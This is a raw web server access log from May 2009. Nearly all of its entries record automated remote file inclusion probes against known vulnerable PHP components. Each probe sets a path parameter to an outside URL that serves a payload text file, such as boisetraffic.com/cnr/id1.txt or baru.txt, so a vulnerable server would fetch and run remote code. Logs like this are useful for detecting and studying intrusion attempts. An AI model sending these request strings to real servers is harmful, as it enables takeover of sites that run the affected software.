77.232.66.198 - - [19/May/2009:04:55:54 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:55:54 -0400] "GET /logs/access_log.Q108061000/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:55:57 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:55:57 -0400] "GET /logs/access_log.Q108061000/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:55:57 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:55:58 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:55:58 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:55:58 -0400] "GET /logs/access_log.Q108061000/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:56:00 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:56:00 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:56:00 -0400] "GET /logs/access_log.Q108061000/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:56:03 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:56:03 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:56:03 -0400] "GET /logs/access_log.Q108061000/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:56:03 -0400] "GET /logs/access_log.Q108061000%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:56:03 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:56:03 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:56:04 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:56:04 -0400] "GET /logs/access_log.Q108061000/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:56:04 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:56:05 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:56:05 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:56:05 -0400] "GET /logs/access_log.Q108061000/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:56:05 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:56:05 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:56:05 -0400] "GET /logs/access_log.Q108061000%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:56:11 -0400] "GET /logs/access_log.Q108110900%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:56:12 -0400] "GET /logs/access_log.Q108061000%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:56:12 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:56:12 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:56:13 -0400] "GET /logs/access_log.Q108110900%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:56:14 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:56:14 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:56:14 -0400] "GET /logs/access_log.Q108061000%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:56:20 -0400] "GET /logs/access_log.Q108110900/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:56:21 -0400] "GET /logs/access_log.Q108110900%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:56:23 -0400] "GET /logs/access_log.Q108110900/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:56:24 -0400] "GET /logs/access_log.Q108110900/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:56:27 -0400] "GET /logs/access_log.Q108110900%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:04:56:54 -0400] "GET /logs/access_log.Q109032000%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:04:56:54 -0400] "GET /logs/access_log.Q109032000%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:56:56 -0400] "GET /logs/access_log.Q108110900/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:57:01 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:57:01 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:57:01 -0400] "GET /logs/access_log.Q108110900/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:04:57:02 -0400] "GET /logs/access_log.Q108112300%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:04:57:04 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:04:57:04 -0400] "GET /logs/access_log.Q109040700//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:04:57:04 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:57:05 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:57:05 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:57:05 -0400] "GET /logs/access_log.Q108061000/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:04:57:09 -0400] "GET /logs/access_log.Q108112300%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
118.220.196.44 - - [19/May/2009:04:57:28 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://r-shooter.com/bbs/data/test.txt?? HTTP/1.1" 404 240 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
118.220.196.44 - - [19/May/2009:04:57:28 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://r-shooter.com/bbs/data/test.txt?? HTTP/1.1" 404 245 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
219.85.63.226 - - [19/May/2009:04:57:32 -0400] "GET /logs/access_log.Q108110900/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:04:57:40 -0400] "GET /logs/access_log.Q108110700//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
62.44.79.35 - - [19/May/2009:04:57:45 -0400] "GET /logs/access_log.Q109032000%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:57:50 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:57:50 -0400] "GET /logs/access_log.Q108061000/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:57:50 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:57:58 -0400] "GET //image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:57:58 -0400] "GET /logs//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:57:58 -0400] "GET /logs/access_log.Q109022600//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:57:58 -0400] "GET //image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:57:58 -0400] "GET /logs//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:57:58 -0400] "GET /logs/access_log.Q109022600//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:58:00 -0400] "GET //image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:58:00 -0400] "GET /logs//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:58:00 -0400] "GET /logs/access_log.Q109022600%20%20//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:58:03 -0400] "GET //image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:58:03 -0400] "GET /logs//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:58:03 -0400] "GET /logs/access_log.Q109022600%20%20//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:58:22 -0400] "GET /logs//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:58:22 -0400] "GET //image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:58:22 -0400] "GET /logs/access_log.Q109022600//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:58:23 -0400] "GET //image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:58:23 -0400] "GET /logs//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:58:23 -0400] "GET /logs/access_log.Q109022600//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:58:23 -0400] "GET //image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:58:23 -0400] "GET /logs//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:58:23 -0400] "GET /logs/access_log.Q109022600//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
85.214.83.196 - - [19/May/2009:04:58:42 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 200 1959 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
85.214.83.196 - - [19/May/2009:04:58:42 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 200 452 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
219.85.63.226 - - [19/May/2009:04:58:46 -0400] "GET //image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:58:46 -0400] "GET /logs//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:58:47 -0400] "GET /logs/access_log.Q109022600//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:59:06 -0400] "GET //image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:59:06 -0400] "GET /logs//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:59:06 -0400] "GET /logs/access_log.Q109022600%20%20//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:59:08 -0400] "GET //image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:59:08 -0400] "GET /logs/access_log.Q109022600%20%20//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:59:08 -0400] "GET /logs//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
74.53.44.114 - - [19/May/2009:04:59:15 -0400] "GET //main.php?page=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
74.53.44.114 - - [19/May/2009:04:59:15 -0400] "GET /logs/access_log.Q109050700//main.php?page=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.53.44.114 - - [19/May/2009:04:59:15 -0400] "GET /logs//main.php?page=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:59:41 -0400] "GET /logs/access_log.Q108110900/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:59:54 -0400] "GET //image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:59:54 -0400] "GET /logs//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:59:54 -0400] "GET /logs/access_log.Q109022600//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:04:59:57 -0400] "GET /logs/access_log.Q109040700%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:05:00:08 -0400] "GET /logs/access_log.Q108110700%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
80.237.146.58 - - [19/May/2009:05:00:41 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
80.237.146.58 - - [19/May/2009:05:00:41 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
80.237.146.58 - - [19/May/2009:05:00:41 -0400] "GET /logs/access_log.Q109022600%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
85.214.83.196 - - [19/May/2009:05:00:52 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 200 452 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
85.214.83.196 - - [19/May/2009:05:00:53 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 200 1959 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
77.232.66.198 - - [19/May/2009:05:00:53 -0400] "GET /logs/access_log.Q108120600%20%20//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:00:53 -0400] "GET /logs/access_log.Q108120600%20%20//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:01:25 -0400] "GET /logs//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:01:25 -0400] "GET //image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:01:25 -0400] "GET /logs/access_log.Q109022600//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
72.30.142.226 - - [19/May/2009:05:01:31 -0400] "GET /Includes/ HTTP/1.0" 200 220 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
80.237.146.58 - - [19/May/2009:05:01:47 -0400] "GET /logs/error_log.Q109050600%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
220.181.7.97 - - [19/May/2009:05:02:24 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [19/May/2009:05:02:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [19/May/2009:05:02:50 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:05:02:53 -0400] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:05:02:53 -0400] "GET /logs/access_log.Q108071500/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:02:53 -0400] "GET /logs/access_log.Q108120600//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
85.214.83.196 - - [19/May/2009:05:03:08 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 200 452 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
85.214.83.196 - - [19/May/2009:05:03:08 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 200 1959 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
219.85.63.226 - - [19/May/2009:05:03:10 -0400] "GET /logs/access_log.Q108120600%20%20//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
